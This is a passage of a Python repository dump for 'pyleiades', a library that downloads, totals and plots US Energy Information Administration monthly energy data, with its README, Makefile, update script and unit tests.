"text": "import pandas as pd\nimport seaborn as sns\nfrom matplotlib import pyplot as plt\nfrom pyleiades.energies import Energy\nfrom pyleiades.utils import inspection\n\nsns.set()\n\nclass Visual:\n \"\"\"\n Create visuals based on energy data.\n\n Takes one or more energy histories as input upon initialization, providing\n methods to visualize the data (including the ability to make comparisons\n across energy sources if more than one energy is given. Visualizations\n include histograms, line graphs, pie charts, and animations.\n\n Attributes\n ––––––––––\n data : DataFrame, optional\n The EIA dataset on which visualizations are based.\n stat_type : str\n The type of statistic ('production', 'consumption', 'import' or\n 'export').\n data_date : str\n The date identifier of the dataset. (The default value is `None`, which\n automatically uses the most recently downloaded dataset.)\n energies : list of Energy object\n A list of energies from the dataset to be visualized.\n\n Parameters\n ––––––––––\n energy_types : str or list of str, optional\n A list of one or more energies to be displayed.\n data : DataFrame, optional\n The EIA dataset to be used. Must be three columns: date, energy\n quantity, and energy code. If omitted, use the default dataset.\n stat_type : str\n The type of statistic to be displayed ('production', 'consumption',\n 'import', or 'export').\n data_date : str\n The date identifier of the dataset. (The default value is `None`, which\n automatically uses the most recently downloaded dataset.)\n \"\"\"\n\n def __init__(self, energy_types=None, data=None, stat_type='consumption',\n data_date=None):\n self.data = data\n self.stat_type = stat_type\n self.data_date = data_date\n self.energies = []\n if energy_types is not None:\n if type(energy_types) is str:\n self.include_energy(energy_types)\n elif type(energy_types) is list:\n self.include_energy(*energy_types)\n else:\n raise ValueError(\"The input energy type(s) must be a single \"\n \"string or a list.\")\n\n self._empty_errmsg = (\"No energy histories have been chosen yet for \"\n \"the visual.\")\n self._freq_errmsg = (\"Frequency '{}' is not compatible with this \"\n \"visual; see documentation for permissible \"\n \"frequency values.\")\n\n def include_energy(self, *energy_types):\n \"\"\"\n Include energy source(s) in the visual.\n\n Parameters\n ––––––––––\n energy_types : str\n The type(s) of energy source to be pulled from the dataset.\n \"\"\"\n for energy_type in energy_types:\n energy = Energy(energy_type, data=self.data,\n stat_type=self.stat_type, data_date=self.data_date)\n self.energies.append(energy)\n\n def linegraph(self, ax=None, freq='yearly', start_date=None,\n end_date=None,):\n \"\"\"\n Make a line graph of the chosen energy source histories.\n\n Parameters\n ––––––––––\n freq : str\n The frequency for plotting data points ('monthly' or 'yearly').\n start_date, end_date : str\n The user specified starting and ending dates for the dataset\n (both inclusive); for 'monthly', acceptable formats are 'YYYYMM',\n 'YYYY-MM', or 'MM-YYYY' (dashes can be substituted for periods,\n underscores, or forward slashes); for 'yearly' or 'cumulative',\n give only the full year, 'YYYY'.\n ax : Axes object, optional\n A set of axes on which to draw the visual. 
(If not provided, a new\n set of axes are created.)\n \"\"\"\n # Input checks\n if len(self.energies) == 0:\n raise RuntimeError(self._empty_errmsg)\n if freq not in ('monthly', 'yearly'):\n raise ValueError(self._freq_errmsg.format(freq))\n\n # Get data for the selected subject and merge into one dataframe\n totals = pd.DataFrame()\n for energy in self.energies:\n energy_totals = energy.totals(freq, start_date, end_date)\n energy_totals.rename(index=str,\n columns={'value': energy.energy_type},\n inplace=True)\n totals = pd.concat([totals, energy_totals], axis=1)\n dates = totals.index\n\n # Generate the plot\n if ax is None:\n fig, ax = plt.subplots(figsize=(10,6))\n for column in totals.columns:\n npoints = len(totals)\n ax.plot(range(npoints), totals[column], label=column)\n ax.legend()\n ax.set_title(f'Energy {self.stat_type} ({freq})')\n ax.set_ylabel('Energy [QBTU]')\n ax.set_xlim(0, npoints)\n if freq == 'yearly':\n interval = 10\n elif freq == 'monthly':\n interval = 120\n ax.set_xticks(range(0, len(dates), interval))\n ax.set_xticklabels(dates[::interval])\n return ax\n"
},
{
"alpha_fraction": 0.6049774885177612,
"alphanum_fraction": 0.6054187417030334,
"avg_line_length": 38.89436721801758,
"blob_id": "d2bc3e07fa9a9b52411efcc8f1d60a71bf363c25",
"content_id": "752e7d93bf9246e8814e20cf886c5bc72ef2c0e1",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11563,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 284,
"path": "/pyleiades/energies.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nfrom .utils.load_data import load_dataset\nfrom .utils.code_conversion import parse_input_date, EIA_CODES\nfrom .utils.inspection import get_period_freqstr\n\nEIA_ENERGIES = list(EIA_CODES.values())\n\nclass Energy:\n \"\"\"\n Collect energy data for a user-defined energy source.\n\n Retrieves data from the specified energy source according to specific\n attributes, such as energy consumed per decade, per year, or all years in\n which more than a certain amount of energy was consumed from that source.\n Use this class to extract and return pure data from the dataset.\n\n Attributes\n ––––––––––\n energy_type : str\n The type of energy source.\n stat_type : str\n The type of statistic ('production', 'consumption', 'import' or\n 'export').\n energy_data : DataFrame\n The complete set of energy data from the EIA MER.\n monthly_data : DataFrame\n All monthly data values from the EIA MER.\n yearly_data : DataFrame\n All yearly data values from the EIA MER.\n\n Parameters\n ––––––––––\n energy_type : str\n The type of energy source to be pulled from the dataset.\n data : DataFrame, optional\n The EIA dataset to be used. Must be three columns: date, energy\n quantity, and energy code. If omitted, use the default dataset.\n stat_type : str\n The type of statistic to be collected ('production', 'consumption',\n 'import', or 'export').\n data_date: str\n The date identifier of the dataset. (The default value is `None`, which\n automatically uses the most recently downloaded dataset.)\n \"\"\"\n\n def __init__(self, energy_type, data=None,\n stat_type='consumption', data_date=None):\n if energy_type.lower() not in EIA_ENERGIES:\n raise ValueError(f\"Energy '{energy_type}' was not found in the EIA \"\n f\"dataset. Available energies are: {EIA_ENERGIES}\")\n self.energy_type = energy_type.lower()\n self.stat_type = stat_type\n\n # Use default dataset if dataset argument is omitted\n if data is None:\n data = load_dataset(dataset_date=data_date, dataset_type=stat_type)\n\n # Isolate this energy's data, separate frequencies, and format the data\n self.energy_data = self._isolate_energy(data)\n self.monthly_data, self.yearly_data = self._sep_freqs(self.energy_data)\n\n self._freq_errmsg = ('Frequency \"{}\" is not compatible with this data; '\n 'see documentation for permissible frequencies.')\n self._extr_errmsg = ('Input \"{}\" is not recognized as an extrema; '\n 'try \"max\" or \"min\"')\n\n def _isolate_energy(self, data):\n \"\"\"\n Isolate one type of energy in the given dataset.\n\n Parameters\n ––––––––––\n data : DataFrame\n The dataset containing all energy values across energy sources.\n\n Returns\n –––––––\n energy_data : DataFrame\n A trimmed version of the original dataset, now with only the\n selected energy source. 
The energy code column is removed.\n \"\"\"\n energy_data = data[data.energy_type == self.energy_type]\n return energy_data[['date', 'value']]\n\n @staticmethod\n def _sep_freqs(data):\n \"\"\"\n Separate the data into monthly and yearly intervals.\n\n Parameters\n ––––––––––\n data : DataFrame\n The dataset to be partitioned into monthly and yearly intervals.\n\n Returns\n –––––––\n monthly_data : DataFrame\n A subset of the data with the energy values reported monthly.\n yearly_data : DataFrame\n A subset of the data with the energy values reported yearly.\n \"\"\"\n # Separate monthly and yearly totals\n monthly_data = data[data.date.map(get_period_freqstr) == 'M'].copy()\n yearly_data = data[data.date.map(get_period_freqstr) == 'A-DEC'].copy()\n # Index the dataframes by the date\n for df in monthly_data, yearly_data:\n df.set_index('date', inplace=True);\n # Remove date code '13' from end of yearly dates\n return monthly_data, yearly_data\n\n @staticmethod\n def _daterange(data, start_date, end_date):\n \"\"\"\n Resize the dataset to cover only the date range specified.\n\n Parameters\n ––––––––––\n data : DataFrame\n A dataframe containing the data to be resized. The index must be\n in the format of the EIA date code ('YYYYMM').\n start_date, end_date : str\n The dataset start/end dates (both inclusive) as strings ('YYYYMM').\n\n Returns\n –––––––\n bound_data : DataFrame\n A dataframe corresponding to the specified date range.\n \"\"\"\n # Use dataset default dates unless otherwise specified by the user\n if start_date is None:\n start_date = data.index.min()\n else:\n start_date = parse_input_date(start_date)\n if end_date is None:\n end_date = data.index.max()\n else:\n end_date = parse_input_date(end_date)\n\n # Ensure that frequencies match\n data_freq = data.index.freqstr\n start_date = start_date.asfreq(data_freq, how='START')\n end_date = end_date.asfreq(data_freq, how='END')\n # Adjust dataset boundaries \n half_bounded_data = data[data.index >= start_date]\n bounded_data = half_bounded_data[half_bounded_data.index <= end_date]\n return bounded_data\n\n def totals(self, freq='yearly', start_date=None, end_date=None, ):\n \"\"\"\n Get the energy statistic totals over a given period.\n\n This method aggregates energy statistic totals according to a user\n defined frequency—either monthly, yearly, or cumulatively. Data is\n collected for the entire dataset unless specific dates are given.\n When dates are provided, the totals are only returned on that time\n interval, with inclusive starting and ending dates. If data at the\n specified frequency does not exist for the entire interval, the interval\n will be automatically adjusted to fit the available data in the\n interval. 
Cumulative totals use yearly data, and so only include data up\n until the last complete year.\n\n Parameters\n ––––––––––\n freq : str\n The frequency for gathering totals ('monthly','yearly',or\n 'cumulative').\n start_date, end_date : str\n The user specified starting and ending dates for the dataset\n (both inclusive); for 'monthly', acceptable formats are 'YYYYMM',\n 'YYYY-MM', or 'MM-YYYY' (dashes can be substituted for periods,\n underscores, or forward slashes); for 'yearly' or 'cumulative',\n give only the full year, 'YYYY'.\n\n Returns\n –––––––\n totals_data : DataFrame, float\n A dataframe containing totals in the specified interval at the\n given frequency, a floating point number if a cumulative sum.\n \"\"\"\n # Bound data at requested frequency by start and end dates\n if freq == 'monthly':\n full_data = self.monthly_data\n elif freq == 'yearly' or freq == 'cumulative':\n full_data = self.yearly_data\n else:\n raise ValueError(self._freq_errmsg.format(freq))\n totals_data = self._daterange(full_data, start_date, end_date)\n # For cumulative totals, take the sum\n if freq == 'cumulative':\n totals_data = totals_data.value.sum()\n return totals_data\n\n def maxima(self, freq='yearly', start_date=None, end_date=None):\n \"\"\"\n Get the maximum energy consumed over a given period (see extrema).\n \"\"\"\n maxima = self.extrema('max', freq=freq, start_date=start_date,\n end_date=end_date)\n return maxima\n\n def minima(self, freq='yearly', start_date=None, end_date=None):\n \"\"\"\n Get the minimum energy consumed over a given period (see extrema).\n \"\"\"\n minima = self.extrema('min', freq=freq, start_date=start_date,\n end_date=end_date)\n return minima\n\n def extrema(self, extremum, freq='yearly', start_date=None, end_date=None):\n \"\"\"\n Get the maximum/minimum energy consumed over a given period.\n\n Parameters\n ––––––––––\n extremum : str\n The exteme value to be found ('max' or 'min').\n freq : str\n The frequency for checking extrema ('monthly' or 'yearly').\n start_date, end_date : str\n The user specified starting and ending dates for the dataset\n (both inclusive); for 'monthly', acceptable formats are 'YYYYMM',\n 'YYYY-MM', or 'MM-YYYY' (dashes can be substituted for periods,\n underscores, or forward slashes); for 'yearly' or 'cumulative',\n give only the full year, 'YYYY'.\n\n Returns\n –––––––\n extrema_date : string\n A string representation of the month in which the extreme value\n occurred (format 'YYYY' or 'YYYYMM')\n extreme_value : float\n A dataframe giving the specified extreme value and the date of\n occurrence for that value.\n \"\"\"\n # Bound data by start and end dates\n if freq == 'monthly':\n full_data = self.monthly_data\n elif freq == 'yearly':\n full_data = self.yearly_data\n else:\n raise ValueError(self._freq_errmsg.format(freq))\n extremum_data = self._daterange(full_data, start_date, end_date)\n\n # Select max or min\n extremum = extremum.lower()[:3]\n if extremum == 'max':\n extremum_val = extremum_data.value.max()\n elif extremum == 'min':\n extremum_val = extremum_data.value.min()\n else:\n raise ValueError(self._extr_errmsg.format(extremum))\n extremum_data = extremum_data[extremum_data.value == extremum_val]\n extremum_date = extremum_data.index[0]\n extreme_value = extremum_data.value[0]\n return extremum_date, extreme_value\n\n def more_than(self, amount, start_date, end_date, interval):\n \"\"\"\n Get data for intervals with more energy consumption than a given level.\n\n Parameters\n ––––––––––\n amount: float\n The lower 
boundary (exclusive) for which data may be included in\n the dataset.\n start_date, end_date : str\n The user specified dataset starting and ending dates (both\n inclusive); acceptable formats are 'YYYYMM', 'YYYY-MM', or\n 'MM-YYYY'. Dashes (\"-\") can be substituted for periods (\".\"),\n underscores (\"_\"), or forward slashes (\"/\").\n interval : str\n The time intervals considered for extrema comparison ('yearly',or\n 'monthly').\n \"\"\"\n raise NotImplementedError\n\n\n\n \"\"\"\n Additonal potential options to add:\n - average yearly energy consumed\n - average seasonal energy consumed\n - consolidate date range selection and monthly/yearly/cumulative selection into a _formatdata method\n \"\"\"\n\n"
},
{
"alpha_fraction": 0.7609223127365112,
"alphanum_fraction": 0.7609223127365112,
"avg_line_length": 31.920000076293945,
"blob_id": "72debc6173c47df9f6e73cd472cc037d7e03cb50",
"content_id": "923f7970615cebffaa908cce0cdc8ddf56984304",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 824,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 25,
"path": "/pyleiades/__init__.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "# Licensed under the FreeBSD license\n\n\"\"\"\npyleiades: Python Library for EIA Data Examination & Exhibition\n\nTools to use with the EIA Monthly Energy Review datasets. This package provides\nan API for performing more sophisticated examination and visualization of the\nEnergy Information Administration (EIA) Monthly Energy Review (MER) datasets.\n\nData can be accessed directly at the EIA website:\n https://www.eia.gov/totalenergy/data/browser/\n\"\"\"\n\nimport os\nfrom pyleiades.energies import Energy\nfrom pyleiades.visuals import Visual\n\npackage_dir = os.path.dirname(__file__)\n\n# Read the contents of the _version file\nwith open(os.path.join(package_dir, '_version')) as version_file:\n __version__ = version_file.read().strip()\n\nDATA_DIR = os.path.join(package_dir, 'data')\nARCHIVE_DIR = os.path.join(DATA_DIR, 'archive')\n\n"
},
{
"alpha_fraction": 0.6961326003074646,
"alphanum_fraction": 0.6961326003074646,
"avg_line_length": 18.39285659790039,
"blob_id": "0db5fd128f3e12ee96c92848a4271eb565280c4d",
"content_id": "4af1eb93816512cf2f27ae69089c13f909b105b7",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 543,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 28,
"path": "/Makefile",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "# Include variables\ninclude config.mk\n\n## dist\t\t: Prepare the package for distribution\n.PHONY : dist\ndist :\n\t$(RM) dist/*\n\tpython setup.py sdist bdist_wheel\n\ttwine upload dist/*\n\n## develop \t: Install the package in development mode\n.PHONY : develop \ndevelop :\n\tpython setup.py develop\n\n## install\t: Install the package\n.PHONY : install\ninstall :\n\tpython setup.py install\n\n## test\t\t: Run tests\n.PHONY : test\ntest :\n\tpytest --cov=pyleiades --cov-config=$(COVERAGE_CONFIG) --cov-report html\n\n.PHONY : help\nhelp : Makefile\n\t@sed -n 's/^##//p' $<\n"
},
{
"alpha_fraction": 0.5416666865348816,
"alphanum_fraction": 0.5416666865348816,
"avg_line_length": 79,
"blob_id": "4cb5814ae424d55a3fa8012709d5760905b81af6",
"content_id": "5b0efa207045bb6cd9a04ec13cf89b6e28123fed",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 240,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 3,
"path": "/tests/__init__.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "# Note that tests should be run from test parent directory (package top)\nimport os, sys \nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))\n"
},
{
"alpha_fraction": 0.6560565829277039,
"alphanum_fraction": 0.6611405611038208,
"avg_line_length": 37.33898162841797,
"blob_id": "19185c06011a3c522b298bf34ccdb6e0a8fd6a59",
"content_id": "007c5b013be45121808f74bbc1bfe6109d265469",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4562,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 118,
"path": "/pyleiades/update.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\"\"\"\nUpdate the pyleiades app data from the EIA website.\n\nAll EIA Monthly Energy Review (MER) data can be found on the EIA website,\nspecifically at 'https://www.eia.gov/totalenergy/data/browser/'. This module\ndownloads that data and stores it in the project's data directory for access by\nthe main pyleiades package.\n\nFunctions\n–––––––––\nmain :\n Execute the update process.\nmove_current_data_to_archive :\n Move the existing current data to archival storage.\nget_current_data_publication_date :\n Get the publication date for the current data (to use when labeling the\n data in the archive).\ngenerate_filename :\n Generate a filename for a table, given its type and format.\ndownload_eia_data_table :\n Download a data table by type and format from the EIA website.\n\"\"\"\nimport os\nimport datetime\nimport urllib.request\nimport pandas as pd\nfrom pyleiades import DATA_DIR, ARCHIVE_DIR\n\n# Define links to the EIA Monthly Energy Review tables\nBASE_URL = 'https://www.eia.gov/totalenergy/data/browser'\nMER_TABLES = {'overview': 'T01.01',\n 'production': 'T01.02',\n 'consumption': 'T01.03',\n 'imports': 'T01.04A',\n 'exports': 'T01.04B'}\nOVERVIEW_TABLE = os.path.join(DATA_DIR, 'EIA_MER_overview')\nTABLE_FORMATS = {'csv': 'csv',\n 'xls': 'xlsx'}\n\ndef generate_filename(table_type, table_format):\n \"\"\"Generate the table's filename given its type and file format.\"\"\"\n ext = TABLE_FORMATS[table_format]\n return f'EIA_MER_{table_type}.{ext}'\n\ndef get_data_publication_date():\n \"\"\"Get the date of the current EIA MER.\"\"\"\n data = pd.read_excel(f'{OVERVIEW_TABLE}.xlsx')\n column = data['U.S. Energy Information Administration'].dropna()\n date_cell = column[column.astype(str).str.contains('Release Date')].iloc[0]\n date_string = date_cell.split(':')[1].strip()\n date = datetime.datetime.strptime(date_string, '%B %d, %Y').date()\n return date\n\ndef include_data_in_archive():\n \"\"\"\n Include the downloaded EIA data in the archive.\n\n Add a folder with the downloaded EIA dataset to the archive location (files\n are all less than one megabyte, so storing them for the conceivable future\n is not problematic.)\n \"\"\"\n # The file exists, get the date and format it properly\n date = str(get_data_publication_date()).replace('-', '')\n new_archive_dir = os.path.join(ARCHIVE_DIR, f'EIA_MER_{date}')\n try:\n os.makedirs(new_archive_dir)\n except OSError:\n # Give the user a chance to avoid files being overwritten\n answer = input( \"It seems as though you already have the most recent \"\n f\"dataset archived already ({new_archive_dir}). Would \"\n \"you like to overwrite that information? [y/n] \")\n if answer[0].lower() != 'y':\n return\n # Move the files to the archive\n for table_title in MER_TABLES:\n for table_format in TABLE_FORMATS:\n filename = generate_filename(table_title, table_format)\n current_path = os.path.join(DATA_DIR, filename)\n if os.path.isfile(current_path):\n new_path = os.path.join(new_archive_dir, filename)\n os.rename(current_path, new_path)\n print(f'Created the archive directory:\\n\\t{new_archive_dir}')\n\n\n\ndef download_eia_data_table(table_title):\n \"\"\"\n Downloads an table type from the EIA website.\n\n Accesses the EIA website and downloads the given table. Tables are\n downloaded as both CSV files and Excel spreadsheets, and saved to the\n `data` directory.\n\n Parameters\n ––––––––––\n table : str\n The name of the table to be downloaded (e.g. 
production, consumption,\n imports, exports).\n \"\"\"\n for table_format in TABLE_FORMATS:\n # URL from https://www.eia.gov/totalenergy/data/browser/ download link\n url = f'{BASE_URL}/{table_format}.php?tbl={MER_TABLES[table_title]}'\n filename = generate_filename(table_title, table_format)\n urllib.request.urlretrieve(url, f'{DATA_DIR}/{filename}')\n\ndef main():\n \"\"\"Update the app's data from the EIA website.\"\"\"\n print()\n # Download the files, with printed status updates\n print('Downloading the most recent EIA monthly energy review data:')\n for table_title in MER_TABLES:\n print(f'\\t-Energy {table_title} table')\n download_eia_data_table(table_title)\n print()\n # Include the data in the archive\n include_data_in_archive()\n print('\\nDownload complete.\\n')\n"
},
{
"alpha_fraction": 0.7007113695144653,
"alphanum_fraction": 0.75,
"avg_line_length": 35.22085952758789,
"blob_id": "c2d8bc2390a9642e229349d1b5c6acea00638aca",
"content_id": "4f3efebf157aa63efd9dc1fdf52811f926ffa2e3",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5908,
"license_type": "permissive",
"max_line_length": 312,
"num_lines": 163,
"path": "/README.md",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "# *pyleiades*\n[](https://travis-ci.org/mitchnegus/pyleiades)\n\n## Python Library for EIA Data Examination & Exhibition\n\n###### A tool for creating visuals from historical energy data (e.g. the EIA monthly energy review).\n \nThis tool is designed to provide insightful, aesthetic and more flexible visualizations of the Energy Information Administration (EIA) monthly energy review datasets.\nThe datasets contain information about the sources of energy Americans have relied on for power since the middle of the 20th century. \nThe datasets begin in 1949 with annual energy production, consumption, import, and export values, and extend up until the present. \nMonthly energy datapoints are reported starting in 1973.\n\nThe basic energy sources are reported in the following groups: \n\n###### Fossil Fuels\n* Coal\n* Natural Gas\n* Petroleum\n\n###### Renewables\n* Wind\n* Solar\n* Hydroelectric\n* Geothermal\n* Biomass\n\n###### Nuclear\n* Fission\n\nThe data is published monthly on the [EIA's website](https://www.eia.gov/totalenergy/data/monthly/), and as of March 31st, 2019 records were provided up through December 2018. This package also includes data up to date through the end of 2018, though more recent data can be downloaded using an included script. \n\nAll reported values are in units of quadrillion british thermal units (1.0E15 BTU). Be aware that the datasets may provide [more precision](https://www.eia.gov/totalenergy/data/monthly/dataunits.php) than is published in the PDF reports.\n\n## Installation\n\n_pyleiades_ is hosted through the Python Package Index (PyPI) and can be easily installed using pip.\nFrom the command line, run\n\n```\n$ pip install pyleiades\n```\n\nThe module requires a recent version of Python 3 (3.6 or greater), pandas, and matplotlib, among others.\nIf you run into trouble running the package, try using the Anaconda environment provided in this repo.\nInstall the environment using the command\n\n```\n$ conda env create -f environment.yml\n```\n\nand activate the environment by issuing the command\n\n```\n$ conda activate pyleiades\n```\n\n## Updating\n\nAn archive of EIA Monthly Energy Review datasets is kept in the `pyleiades` data repository. \nThis may not include the most up to date information, and so the package comes with a script to update the available data.\nOnce the package is installed, run \n\n```\n$ update_eia_data.py\n```\n\nfrom the command line to download the most recent data from the EIA website. \n\n## Using the API\n\nThe API is built around two main object types—the `Energy` and `Visual` classes.\n\n### The `Energy` object\n\nTo access the EIA data directly for a certain energy type, use the `Energy` class.\nFor example, the energy consumption data for all renewable energy sources can be accessed with:\n\n```\n>>> from pyleiades import Energy\n>>> renewables = Energy('renewable')\n```\n\nThe resulting `renewables` object stores the complete consumption history within the `energy_data` dataframe attribute.\n\n```\n>>> renewables.energy_data\n date value\n6220 1949 2.973984\n6221 1950 2.977718\n6222 1951 2.958464\n6223 1952 2.940181\n...\n```\n\nThe `date` column gives the reporting date (in the format `YYYY` for full year totals or `YYYY-MM` for monthly totals) and the `value` column gives the consumption amounts (in QBTU) for each date. 
\n\nEnergy consumption values are the default, however the `Energy` objects can also be used to access production, import and export statistics.\nThe type of statistic can be selected using the `stat_type` keyword argument.\n\n```\n>>> renewables = Energy('renewable', stat_type='production')\n>>> renewables.energy_data\n date value\n6220 1949 1.549262\n6221 1950 1.562307\n6222 1951 1.534669\n6223 1952 1.474369\n```\n\nPerhaps more interesting than the complete history, however, are more sophisticated features of the data, like interval specific totals and extremes.\n\nUsing the `totals` method of an `Energy` object allows the data to be totaled at a specified interval—either monthly, yearly, or cumulatively.\n\n```\n>>> renewables.totals('monthly')\n value\n date\n1973-01 0.403981\n1973-02 0.360900\n1973-03 0.400161\n1973-04 0.380470\n```\n\nNotice that here the monthly data only goes back as far as 1973 (though the `energy_data` attribute showed yearly data for renewable energy dating back to 1949). \nBy default, the `totals` method selects the entire range of available data, though what is available on a monthly vs. yearly basis might be different. \nThis behavior can be overriden by providing start and end dates for some interval as keyword arguments.\nTo only get monthly renewable energy data from 2000 to 2010, this would be:\n\n```\n>>> renewables.totals(freq='monthly', start_date='2000-01', end_date='2009-12')\n value\n date\n2000-01 0.505523\n2000-02 0.498993\n2000-03 0.558474\n2000-04 0.567147\n```\n\nTo get extremes over a dataset interval, use the `maxima` or `minima` methods.\n\n### The `Visual` object\n\nA `Visual` allows the package to create plots of several energy types. \nThe initialization parameters for a `Visual` are similar to those for an `Energy` object. \nA `Visual` can accept a single energy type or a list of energy types, optionally followed by a type of statistic (consumption by default).\n\n```\nvisual = Visual(['coal', 'nuclear', 'renewable'])\n```\n\nThis visual object's methods can then be used to generate any of a variety of visuals. \n\nTo generate a linegraph of energy totals, use the `linegraph` method.\nThe syntax is again similar to that of the `Energy` object's `totals` method.\nHere's an example:\n\n```\nvisual.linegraph(freq='yearly', start_date='1970')\n```\n\n\n\nRun the very simple installed script `pyleiades-demo.py` to see the package in action.\n"
},
{
"alpha_fraction": 0.849056601524353,
"alphanum_fraction": 0.849056601524353,
"avg_line_length": 25.5,
"blob_id": "ac92fb8b019b01c33c0e5190216826a8b89b4de1",
"content_id": "b92928b84efa6936f84e83977bf9461409120a34",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 53,
"license_type": "permissive",
"max_line_length": 27,
"num_lines": 2,
"path": "/config.mk",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "# Coverage configuration\nCOVERAGE_CONFIG=.coveragerc\n"
},
{
"alpha_fraction": 0.6181570887565613,
"alphanum_fraction": 0.635668158531189,
"avg_line_length": 43.90076446533203,
"blob_id": "77cd83412224e6e70ee24c46085bf3d52a0f8a21",
"content_id": "a88b38332d34b8ab1ebe94435a9f8bd4ecab014a",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5882,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 131,
"path": "/tests/test_energies.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "import pytest\nimport numpy as np\nimport pandas as pd\nfrom pyleiades.energies import Energy\n\nclass TestEnergy:\n\n def test_ignore_case(self, testdata):\n nuc_test_data = testdata.iloc[7:].value\n nuc = Energy('Nuclear', data=testdata)\n nuc_energy_data = nuc.energy_data.value\n assert nuc_energy_data.equals(nuc_test_data)\n\n def test_invalid_energy(self, testdata):\n with pytest.raises(ValueError):\n Energy('test', data=testdata)\n\n def test_isolate_energy(self, testdata):\n nuc_test_data = testdata.iloc[7:].value\n nuc = Energy('nuclear', data=testdata)\n nuc_energy_data = nuc.energy_data.value\n assert nuc_energy_data.equals(nuc_test_data)\n\n def test_default_data(self, testdata, testvals):\n nuc_test_data = testdata.iloc[7:].value\n nuc = Energy('nuclear')\n nuc_energy_data = nuc.energy_data.value.values\n assert np.array_equal(nuc_energy_data, nuc_test_data)\n\n def test_monthly_data(self, testdata, testvals):\n nuc_test_data = np.concatenate([testvals[8:20], testvals[21:23]])\n nuc = Energy('nuclear', data=testdata)\n nuc_monthly_data = nuc.monthly_data.value.values\n assert np.array_equal(nuc_monthly_data, nuc_test_data)\n\n def test_yearly_data(self, testdata, testvals):\n nuc_test_data = np.array([testvals[7], testvals[20]])\n nuc = Energy('nuclear', data=testdata)\n nuc_yearly_data = nuc.yearly_data.value.values\n assert np.array_equal(nuc_yearly_data, nuc_test_data)\n\n def test_daterange_bounding_inputs(self, testdata, testvals):\n nuc_test_date_range = np.concatenate([testvals[10:20], testvals[21:22]])\n nuc = Energy('nuclear', data=testdata)\n nuc_date_range = nuc._daterange(nuc.monthly_data, '197303', '197401') \\\n .value.values\n assert np.array_equal(nuc_date_range, nuc_test_date_range)\n\n def test_daterange_bounding_defaults(self, testdata, testvals):\n nuc_test_date_range = np.concatenate([testvals[8:20], testvals[21:23]])\n nuc = Energy('nuclear', data=testdata)\n nuc_date_range = nuc._daterange(nuc.monthly_data, None, None) \\\n .value.values\n assert np.array_equal(nuc_date_range, nuc_test_date_range)\n\n def test_totals_monthly(self, testdata, testvals):\n nuc_test_totals = np.concatenate([testvals[8:20], testvals[21:23]])\n nuc = Energy('nuclear', data=testdata)\n nuc_monthly_totals = nuc.totals('monthly').value.values\n assert np.array_equal(nuc_monthly_totals, nuc_test_totals)\n\n def test_totals_yearly(self, testdata, testvals):\n valarray = testdata.value.values\n nuc_test_totals = np.array([testvals[7], testvals[20]])\n nuc = Energy('nuclear', data=testdata)\n nuc_yearly_totals = nuc.totals('yearly').value.values\n assert np.array_equal(nuc_yearly_totals, nuc_test_totals)\n\n def test_totals_cumulative(self, testdata, testvals):\n nuc_test_total = np.sum(np.array([testvals[7], testvals[20]]))\n nuc = Energy('nuclear', data=testdata)\n nuc_cumulative_total = nuc.totals('cumulative')\n assert nuc_cumulative_total == nuc_test_total\n\n def test_totals_invalid_freq(self, testdata):\n nuc = Energy('nuclear', data=testdata)\n with pytest.raises(ValueError):\n nuc_cumulative_total = nuc.totals('test')\n\n def test_maxima_month(self, testdata):\n nuc_test_max_month, nuc_test_max_val = pd.Period('197310', 'M'), 0.20\n nuc = Energy('nuclear', data=testdata)\n nuc_max_month, nuc_max_val = nuc.maxima('monthly')\n assert nuc_max_month == nuc_test_max_month\n assert nuc_max_val == nuc_test_max_val\n\n def test_minima_month(self, testdata):\n nuc_test_min_month, nuc_test_min_val = pd.Period('197303', 'M'), 0.09\n nuc = Energy('nuclear', data=testdata)\n 
